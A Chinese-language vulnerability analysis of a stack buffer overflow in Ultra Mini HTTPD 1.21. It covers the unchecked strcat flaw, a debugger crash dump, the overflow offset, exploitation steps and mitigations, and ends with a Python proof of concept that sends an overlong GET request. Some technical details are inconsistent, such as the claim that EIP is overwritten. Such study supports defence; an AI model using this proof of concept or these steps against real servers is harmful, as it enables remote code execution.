Mini HTTPD 1.21 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
漏洞名称<\/strong>: Ultra Mini HTTPD 栈缓冲区溢出漏洞
影响版本<\/strong>: Ultra Mini HTTPD 1.21
漏洞类型<\/strong>: 基于堆栈的缓冲区溢出
威胁等级<\/strong>: 高危
影响范围<\/strong>: 使用该版本HTTP服务器的Windows系统
漏洞模块<\/strong>: exploit\/windows\/http\/ultraminihttp_bof<\/p>

漏洞原理<\/h2>
该漏洞存在于Ultra Mini HTTPD服务器的请求处理过程中，当服务器接收到HTTP请求时，会尝试将请求的URL拼接成文件路径进行读取。如果文件不存在，服务器会生成一个"404 Not Found"错误页面。在这个过程中，服务器没有对URL长度进行严格检查，导致在拼接错误信息时发生栈溢出，攻击者可以通过精心构造的超长URL覆盖返回地址，从而执行任意代码。<\/p>
漏洞复现环境<\/h2>

操作系统<\/strong>: Windows XP Home with Service Pack 3 (x86)<\/li>
调试工具<\/strong>:

IDA Pro 8.3 (宿主机)<\/li>
WinDbg 6.11 (虚拟机)<\/li> <\/ul> <\/li>
目标软件<\/strong>: minihttpd.exe (从minihttpd120.lzh解压)<\/li> <\/ul>
漏洞分析<\/h2>
漏洞触发流程<\/h3>

服务器接收HTTP GET请求<\/li>
尝试将URL路径拼接为本地文件路径<\/li>
文件不存在时进入错误处理流程<\/li>
使用sprintf<\/code>格式化404错误信息<\/li>
使用strcat<\/code>将错误信息拼接到缓冲区<\/li>
由于缺乏长度检查，导致栈缓冲区溢出<\/li> <\/ol> 关键代码分析<\/h3> 漏洞主要出现在错误处理流程中：<\/p> if<\/span> (TargetHandle ==<\/span> (HANDLE)-<\/span>1<\/span>) { \/\/ 文件打开失败 <\/span><\/span><\/span><\/span> sprintf(v114, a404NotFound); \/\/ 格式化404错误信息 <\/span><\/span><\/span><\/span> strcat(v119, v114); \/\/ 拼接错误信息，此处发生缓冲区溢出 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>strcat<\/code>函数没有对目标缓冲区大小进行检查，直接将源字符串拼接到目标缓冲区末尾，当源字符串过长时就会覆盖栈上的其他数据，包括返回地址。<\/p> 崩溃分析<\/h3> 使用PoC触发漏洞时，Windbg显示：<\/p> (f48.b18): Access violation - code c0000005 (first chance) eax=00000000 ebx=000000c8 ecx=ffffffff edx=00000007 esi=7d58dc91 edi=0000000e eip=0040260d esp=00c7dc6c ebp=836f09be iopl=0 minihttpd+0x260d: 0040260d f2ae repne scasb <\/code><\/pre> 崩溃发生在minihttpd+0x260d<\/code>，这是strcat<\/code>函数内部的一个字符串操作指令。此时EIP已被覆盖为攻击者控制的值。<\/p> 漏洞利用<\/h2> 偏移量确定<\/h3> 通过多次测试确定精确的溢出偏移量：<\/p> 初始测试使用A-F各1000字节的缓冲区<\/li> 发现程序在F(0x46)填充处崩溃<\/li> 使用二分法逐步缩小范围<\/li> 最终确定在397个"F"字符时触发崩溃<\/li> <\/ol> 利用要点<\/h3> 线程处理<\/strong>: 应用程序的请求处理线程在60秒后会被监控线程终止，因此需要：<\/p> 分配RWX内存<\/li> 将payload复制到该内存<\/li> 创建新线程执行payload<\/li> 终止当前线程避免进程崩溃<\/li> <\/ul> <\/li> Payload构造<\/strong>:<\/p> 需要精确控制溢出长度<\/li> 覆盖返回地址指向shellcode<\/li> 考虑DEP\/ASLR绕过（在Windows XP上通常不需要）<\/li> <\/ul> <\/li> <\/ol> Metasploit模块<\/h3> 漏洞已被集成到Metasploit框架中：<\/p> exploit\/windows\/http\/ultraminihttp_bof <\/code><\/pre> 防护措施<\/h2> 厂商修复<\/strong>: 升级到最新版本<\/li> 缓解措施<\/strong>: 在网络边界过滤超长URL请求<\/li> 启用DEP保护<\/li> 使用Web应用防火墙(WAF)<\/li> <\/ul> <\/li> 开发建议<\/strong>: 使用安全的字符串函数（如strncat<\/code>替代strcat<\/code>）<\/li> 对所有用户输入进行长度检查<\/li> 启用编译器的栈保护选项<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> 原始漏洞分析文章<\/li> Metasploit模块文档<\/li> Windows缓冲区溢出防护机制文档<\/li> <\/ol> 附录：完整PoC代码<\/h2> import<\/span> sys <\/span><\/span>import<\/span> socket <\/span><\/span> <\/span><\/span># 精确触发漏洞的PoC<\/span> <\/span><\/span>def<\/span> exploit<\/span>(): <\/span><\/span> # 构造精确的缓冲区<\/span> <\/span><\/span> buffer =<\/span> "A"<\/span> *<\/span> 397<\/span> # 精确偏移量<\/span> <\/span><\/span> buffer +=<\/span> "<\/span>\x90\x90\x90\x90<\/span>"<\/span> # 覆盖EIP的地址（示例中使用NOP）<\/span> <\/span><\/span> <\/span><\/span> HOST =<\/span> '127.0.0.1'<\/span> <\/span><\/span> PORT =<\/span> 80<\/span> <\/span><\/span> <\/span><\/span> # 构造恶意请求<\/span> <\/span><\/span> req =<\/span> "GET \/"<\/span> +<\/span> buffer +<\/span> " HTTP\/1.1<\/span>\r\n\r\n<\/span>"<\/span> <\/span><\/span> <\/span><\/span> # 发送请求<\/span> <\/span><\/span> s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM) <\/span><\/span> s.<\/span>connect((HOST, PORT)) <\/span><\/span> s.<\/span>send(req.<\/span>encode()) <\/span><\/span> <\/span><\/span> # 接收响应<\/span> <\/span><\/span> data =<\/span> b<\/span>""<\/span> <\/span><\/span> while<\/span> True<\/span>: <\/span><\/span> chunk =<\/span> s.<\/span>recv(1024<\/span>) <\/span><\/span> if<\/span> not<\/span> chunk: <\/span><\/span> break<\/span> <\/span><\/span> data +=<\/span> chunk <\/span><\/span> s.<\/span>close() <\/span><\/span> print('Received'<\/span>, repr(data)) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> exploit() <\/span><\/span><\/code><\/pre>注意：实际利用时需要将覆盖EIP的地址替换为实际可用的跳转地址，并构造有效的shellcode。<\/p>